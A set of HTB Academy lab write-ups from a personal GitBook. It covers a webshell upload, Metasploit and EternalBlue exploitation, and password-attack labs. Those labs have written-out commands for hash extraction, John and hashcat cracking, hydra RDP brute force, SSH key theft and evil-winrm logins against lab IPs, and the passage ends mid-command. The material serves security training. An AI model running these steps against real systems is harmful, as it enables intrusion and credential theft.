[http://172.16.1.11/](http://172.16.1.11/) but found no useful information, so I took a look at /etc/hosts and I found `**status.inlanefreight.local**` ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fc14cZT22y9mwrp56AOEf%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3D8e7292a7-b505-4700-9a03-6b67bb404a58&width=768&dpr=4&quality=100&sign=4b13e69&sv=2) Based on the nmap results, we identified the system as a Windows Server 2019. Subsequently, I utilized whatweb to determine the specific server software in order to generate a payload using msfvenom. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F1R1X3vSkG5arwqvOvD7l%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3Dbaaff554-f6f7-4ea0-9ad4-0ed8eb0bec80&width=768&dpr=4&quality=100&sign=134b5bc5&sv=2) Based on the findings, the server currently in operation utilizes ASP.NET. Consequently, we shall proceed to generate our payload. Let's aim to establish a shell. I utilized the Laudanum webshell available at the following link. [![Logo](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=4&quality=100&sign=d209358c&sv=2)Web-Shells/laudanum at master · jbarcia/Web-ShellsGitHub](https://github.com/jbarcia/Web-Shells/tree/master/laudanum) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FsEr85YTowdwlFLx264Bq%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3Dde8938f3-a680-4b33-9bdc-2dbfbc050a33&width=768&dpr=4&quality=100&sign=c6d2ab2b&sv=2) I included my IP address in the list of allowd IPs within the webshell file. Let's proceed with uploading the file to establish shell access. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FWRUKSdEa2IwgDWGDwTYZ%252FScreenshot%2811%29.png%3Falt%3Dmedia%26token%3Dde0563e3-a62f-48ba-aadc-020b65e0ab40&width=768&dpr=4&quality=100&sign=9594d3b0&sv=2) We have successfully obtained a shell and can now access the folder located at C:\\Shares. Next up is the second host: `**blog.inlanefreight.local.**` ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FrWV6jNcktNMt01eugl9t%252FScreenshot%2812%29.png%3Falt%3Dmedia%26token%3D22dda844-dc05-4609-9504-9a0aa166e094&width=768&dpr=4&quality=100&sign=6acbde5b&sv=2) Two ports, 22 and 80, are open. Upon accessing port 80, a post directing to an exploit named 50064. However, since this attack requires authentication, I conducted directory enumeration to gather additional information. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F60iFvoD1KOKQPMobyH0F%252FScreenshot%2813%29.png%3Falt%3Dmedia%26token%3D52003782-341c-4e84-8bdb-89a545203f27&width=768&dpr=4&quality=100&sign=cb1b98e3&sv=2) After conducting directory enumeration, I discovered a directory labeled 'data.' Upon accessing it, I encountered a file named 'config.ini' which contain the necessary username and password for executing this attack. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FfifKzX0zXueTuzqquwR8%252FScreenshot%2814%29.png%3Falt%3Dmedia%26token%3Def39377c-3c73-447a-b595-7d4a7c6205ff&width=768&dpr=4&quality=100&sign=e03928b3&sv=2) I initially transferred the exploit to /usr/share/metasploit-framework/modules/exploits/ and subsequently successfully exploited the second target. You'll discover the flag located in the `**customscripts**` folder. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FqHtVPy5WVnpeQ6V5f9FR%252FScreenshot%2815%29.png%3Falt%3Dmedia%26token%3Dfaacc12f-fd99-4f39-a044-803a4d726579&width=768&dpr=4&quality=100&sign=ef4c72c&sv=2) What language is the shell written in that gets uploaded when using the 50064.rb exploit? `**php**` Let's now investigate the third target: `**172.16.1.13**` ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FOebrlnc28rL2A0JR9hf4%252FScreenshot%2816%29.png%3Falt%3Dmedia%26token%3D140a0ee6-8455-4168-94e6-d83845013eaf&width=768&dpr=4&quality=100&sign=2dd2602b&sv=2) After conducting reconnaissance, I discovered that the server operates on Windows Server 2016 and utilizes the SMB protocol. Let's proceed with attempting to exploit it, as it may be vulnerable to EternalBlue. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fpk6UzbP0s8KW9r4MSRFj%252FScreenshot%2817%29.png%3Falt%3Dmedia%26token%3Dfc3c976d-db6a-417e-b946-c0bf6895ef48&width=768&dpr=4&quality=100&sign=4dbf6706&sv=2) So the host is likely vulnerable to MS17-010, so let's exploit it. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FQlc8mC9fb5yH78Q910AU%252FScreenshot%2818%29.png%3Falt%3Dmedia%26token%3Dbc7e0d00-f0dc-4261-b550-3030d87f38cb&width=768&dpr=4&quality=100&sign=c4bc504a&sv=2) You now have access to the flag. Thank you for taking the time to read this writeup. Wishing you a wonderful day ahead. [PreviousShells & Payloads](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads) [NextPassword Attacks](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks) Last updated 1 year ago * [Now Let’s Begin 🚀](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#df44) * [Scenario:](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#scenario) * [Objectives:](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#objectives) * [Credentials](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#credentials) * [Targets](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#targets) --- # Lab - Medium | FaresMorcy Hello, everyone. Today, we will be exploring the Medium-level Password Attacks Walkthrough lab from the HTB Academy Penetration Testing Course. Our goal is to obtain the contents of flag.txt in /root/ . First, we will perform an IP scan to identify open ports and assess the available options. Copy nmap -sC -sV 10.129.223.102 ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FWj5W9NQcT7rOsb8Ntsna%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3D3d34067d-899f-4bd6-9839-97acfa139f8e&width=768&dpr=4&quality=100&sign=673ebf7f&sv=2) We have three open ports (22, 139, 445). Let's list the shared resources available on the server. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F5n0LnJxMGt0sUekamdTM%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D0971333d-af61-4359-9942-a9fe84ac3fea&width=768&dpr=4&quality=100&sign=fdbe0a65&sv=2) Let's review the contents of the SHAREDRIVE share. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FWmJl6ntp9zAEsspvI8DC%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3D913ce23a-2641-4be1-9310-cc0f2f855a39&width=768&dpr=4&quality=100&sign=c450ef22&sv=2) First, let's apply the rules from `custom.rule` to each word in `password.list` and save the modified versions in `mut_password.list`. Next, let's extract any useful information from the "Docs.zip" file obtained from the SMB server. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F0QEYWoKZOecoMmvFgIId%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3Dbea9371e-eb5f-48d6-98c9-65feb5dfb596&width=768&dpr=4&quality=100&sign=2805cbe4&sv=2) We have obtained the password for the file "Docs.zip." Let's use it to extract the contents. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMz5bvX20ByMs7xd0UBNK%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3D1f2eff58-e9a3-42f7-b6c2-7e1cb2294b3d&width=768&dpr=4&quality=100&sign=a12e0aac&sv=2) I've received a file named Documentation.docx. Let's examine it to determine the information it contains. I attempted to open the file, but it is password-protected. Let's proceed with cracking it. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FpLZ0n4RfhnbGeA7oRBnS%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3Db49da0ca-6849-41c8-9868-ebc62129567b&width=768&dpr=4&quality=100&sign=255fcc96&sv=2) We now have the password. Let's proceed by opening the Documentation.docx file to review its contents. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FCscVofZUXQlzOrwWwB62%252FScreenshot%287%29.png%3Falt%3Dmedia%26token%3D998b26f3-0b39-4826-a260-40c70fcc79c2&width=768&dpr=4&quality=100&sign=d228ac4a&sv=2) We have obtained the password for the username "jason." Let's proceed with attempting to connect via SSH using these credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FIWvVQEUdWIJ0B3HvRA4s%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3D7f9fde17-68cb-4da4-84ea-f9841a614dd0&width=768&dpr=4&quality=100&sign=1b36511b&sv=2) We have successfully established an SSH connection using the user account "jason". I investigated and found that port 3306 is open, which is the default port for MySQL. Let's attempt to connect to the MySQL server using Jason's credentials again. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FEdn96rDlOnYTtTWHCzam%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3Dcbfffc11-450b-4d5e-b8ef-a9e39fd3a4ae&width=768&dpr=4&quality=100&sign=c6383ba0&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FK1RRcj9pr2ZCP1nI7f6p%252FScreenshot%2810%29.png%3Falt%3Dmedia%26token%3De3b60f5a-3107-4da9-a40f-da23dd55c9c4&width=768&dpr=4&quality=100&sign=7dee39ec&sv=2) Let's analyze the database to determine what information we can extract. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fd9N5TFMvFikXCfzxPPNi%252FScreenshot%2812%29.png%3Falt%3Dmedia%26token%3D1b06ce40-d667-4e7c-9e08-77ae3549162b&width=768&dpr=4&quality=100&sign=d3e289ab&sv=2) During the investigation, I discovered an additional username, "dennis," and obtained the associated password from the MySQL server. Let's use these credentials to log in as the user "dennis". ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fb6hSeAXyL2lNV51nYJ3q%252FScreenshot%2813%29.png%3Falt%3Dmedia%26token%3Dc8c2a95c-ca1b-4097-89df-fe3d6043c5c1&width=768&dpr=4&quality=100&sign=600dee90&sv=2) I conducted an extensive investigation to locate the flag and discovered a hint indicating that useful files might be available in the home directory of one of the users. Let's proceed by obtaining the SSH key for the user Dennis. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FOYE6T9GOpymF4gGdvB3j%252FScreenshot%2814%29.png%3Falt%3Dmedia%26token%3Dd7445181-8692-4b17-883d-97493a25db85&width=768&dpr=4&quality=100&sign=7c21b331&sv=2) Let's copy the content of `id_rsa` to a file in our attacking machine and adjust its permissions to enable its use. Before doing so, let's extract the password first. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FI77qTUO9ZKZ6l9oojRzq%252FScreenshot%2815%29.png%3Falt%3Dmedia%26token%3D48a09bb6-53a5-44ca-b1c2-ea6222c312d0&width=768&dpr=4&quality=100&sign=dcf572a3&sv=2) First we extracted the hash from the SSH private key file (`id_rsa`) so that it can be cracked using the John the Ripper. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FiYQyDu9Oot7fyCkwCiJW%252FScreenshot%2816%29.png%3Falt%3Dmedia%26token%3Df09e537c-b6e6-4bcf-93b3-69b07c68ed5c&width=768&dpr=4&quality=100&sign=5c235a32&sv=2) Here we have obtained the password. Let's update the file permissions and use the file with root access to verify if this solution works. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FHjIf1z5NlQTpJljdvbWZ%252FScreenshot%2817%29.png%3Falt%3Dmedia%26token%3D89625627-e6f5-4caf-8d42-da2b6c70f1f8&width=768&dpr=4&quality=100&sign=147a3e6c&sv=2) Now we can get the flag. [PreviousLab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-easy) [NextLab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-hard) Last updated 1 year ago Copy smbclient -N -L \\\\10.129.223.102\\ Copy smbclient //10.129.223.102/SHAREDRIVE Copy hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list Copy zip2john Docs.zip > zip.hash john --wordlist=mut_password.list zip.hash Copy unzip Docs.zip Copy /usr/share/john/office2john.py Documentation.docx > docs.hash john --wordlist=mut_password.list docs.hash Copy ssh jason@10.129.223.102 Copy mysql -ujason -p Copy show databases; use users; show tables; select * from creds where name = 'dennis'; Copy su dennis Copy cd .ssh cat id_rsa Copy nano id_rsa ssh2john id_rsa > ssh.hash Copy john --wordlist=mut_password.list ssh.hash Copy ssh -i id_rsa root@10.129.223.102 --- # SOC Hackthebox Notes & Labs | FaresMorcy ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Ff3iSIFiP4MTyFo9BBXPT%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D2d5bc416-3176-494f-ab78-b36b1012bda1&width=768&dpr=4&quality=100&sign=61b7552f&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMMtZNzTDttAN3xjZtq72%252FScreenshot.png%3Falt%3Dmedia%26token%3D0d68cba9-ee76-4248-9520-a0d92fb603fe&width=768&dpr=4&quality=100&sign=ce642761&sv=2) [PreviousAD Enumeration & Attacks - Skills Assessment Part II](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-ii) [NextSecurity Monitoring & SIEM Fundamentals Module](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/security-monitoring-and-siem-fundamentals-module) Last updated 1 year ago --- # Lab - Hard | FaresMorcy The next host is a Windows-based client. As with the previous assessments, our client would like to make sure that an attacker cannot gain access to any sensitive files in the event of a successful attack. While our colleagues were busy with other hosts on the network, we found out that the user `**Johanna**` is present on many hosts. However, we have not yet been able to determine the exact purpose or reason for this. Given that the user **Johanna** appears on multiple hosts, we should proceed with attempting to crack her password. The host is a Windows-based client, so we will proceed with cracking using the RDP protocol. Copy hydra -l johanna -P mut_password.list rdp://10.129.211.174 ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FN0GIXL4Npqls6x2xKAF5%252FScreenshot%2818%29.png%3Falt%3Dmedia%26token%3De9f48fb8-16a6-4907-8ef1-60101726d3f5&width=768&dpr=4&quality=100&sign=9eaa8a0b&sv=2) We have obtained the password for the user Johanna. Let's proceed with logging in using these credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FZovTrrae9z6uRomzqsms%252FScreenshot%2819%29.png%3Falt%3Dmedia%26token%3D7900daf4-d3b1-4863-9ff1-bcd8e6a95545&width=768&dpr=4&quality=100&sign=11ec8eda&sv=2) We have successfully logged in. Let's proceed with the next steps. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F2PeoByeRHMJF6KNtvev0%252FScreenshot%2820%29.png%3Falt%3Dmedia%26token%3D4753003e-1ccc-418f-8248-957221f7fd1c&width=768&dpr=4&quality=100&sign=881c3f3e&sv=2) I located a file named Logins.kdbx and subsequently downloaded it to my analysis workstation. The file is password-protected. Therefore, we should attempt to extract the password hash from this KeePass database file. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMPciPoCz9CGtqs7rvYJ5%252FScreenshot%2821%29.png%3Falt%3Dmedia%26token%3D632df4fc-312c-49ac-856a-0d428d57e304&width=768&dpr=4&quality=100&sign=640b60be&sv=2) Now let's open the Logins.kdbx file using keepassxc. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FjGHGtWEqGjG4CmB1StxI%252FScreenshot%2822%29.png%3Falt%3Dmedia%26token%3D31a84e73-7bc5-41c6-be0a-103162e41957&width=768&dpr=4&quality=100&sign=1c6a8e9d&sv=2) I discovered credentials for the user "david." ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FZpMCo7kgwOdUWpubstNd%252FScreenshot%2823%29.png%3Falt%3Dmedia%26token%3D62d0e022-0fec-44e3-80c4-4bca1ca0d2d7&width=768&dpr=4&quality=100&sign=5889f291&sv=2) After a while, I used `smbclient` with David's credentials to assess the available resources. There is a virtual hard disk named Backup.vhd. let's transfer it to our attacking machine. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FfT9yvDJzd73grcXELWTn%252FScreenshot%2824%29.png%3Falt%3Dmedia%26token%3D189f01fa-a60a-4290-9087-d59ad7bc8339&width=768&dpr=4&quality=100&sign=9ac02acb&sv=2) It's an encrypted virtual hard disk. Let's proceed with the decryption process. [![Logo](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=4&quality=100&sign=c949e914&sv=2)Mounting Bit-locker encrypted vhd files in LinuxMedium](https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0) Let's extract the BitLocker recovery information from the VHD file and format it into a hash that can be used for password cracking with John the Ripper. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FHrSjPgHAeofH1nNaAWvH%252FScreenshot%2825%29.png%3Falt%3Dmedia%26token%3De6823692-908a-48a5-a204-58c030b7c675&width=768&dpr=4&quality=100&sign=708aa22d&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FRRBhH5qn2jcm5OfzWl8h%252FScreenshot%2826%29.png%3Falt%3Dmedia%26token%3Dc9212404-44b4-455a-999c-845038cb0505&width=768&dpr=4&quality=100&sign=47feb28e&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fr2KNSJswspDxY7XpbeR9%252FScreenshot%2827%29.png%3Falt%3Dmedia%26token%3Da325f939-d3a3-4d93-9aa2-b17368668e1a&width=768&dpr=4&quality=100&sign=94b2b810&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FiHa0UQHOxF3OdJR8bgWf%252FScreenshot%2828%29.png%3Falt%3Dmedia%26token%3D9a918a10-0fb4-42bb-b400-92cb672f6df6&width=768&dpr=4&quality=100&sign=105b4d84&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FKASjzxeE4yxp4K2y3cpf%252FScreenshot%2830%29.png%3Falt%3Dmedia%26token%3D312b2dc8-ad71-4e63-9489-e0284e6e7a5c&width=768&dpr=4&quality=100&sign=ae80a08a&sv=2) Here, we can see the NT hash for the Administrator account. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FlV8DBPAWry2iHTWZBIDV%252FScreenshot%2832%29.png%3Falt%3Dmedia%26token%3D0675f6a3-843e-4244-a306-cd0df2175d80&width=768&dpr=4&quality=100&sign=786c2481&sv=2) Let's save the file and attempt to crack it using John the Ripper. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F7pmGT8Ty4qxQq4fhkim2%252FScreenshot%2833%29.png%3Falt%3Dmedia%26token%3D4d4bf3c5-6768-4fed-b760-b987a0719c37&width=768&dpr=4&quality=100&sign=2df764b1&sv=2) We now have the password. Let's proceed with connecting using these credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FZhDONFWQiBKfT4kzTG4e%252FScreenshot%2834%29.png%3Falt%3Dmedia%26token%3D0d597ed4-640a-4332-9ccc-84ec45cb8844&width=768&dpr=4&quality=100&sign=7a8cb4a&sv=2) Now we can get the flag. [PreviousLab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-medium) [NextActive Directory Enumeration & Attacks](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks) Last updated 1 year ago Copy evil-winrm -i 10.129.211.174 -u johanna -p 1231234! Copy download "C:/Users/johanna/Documents/Logins.kdbx" /home/htb-ac-1224655/Logins.kdbx Copy eepass2john Logins.kdbx > keys.hash john --wordlist=mut_password.list keys.hash Copy smbclient -U david //10.129.211.174/david Copy bitlocker2john -i Backup.vhd > backup.hashes Copy grep 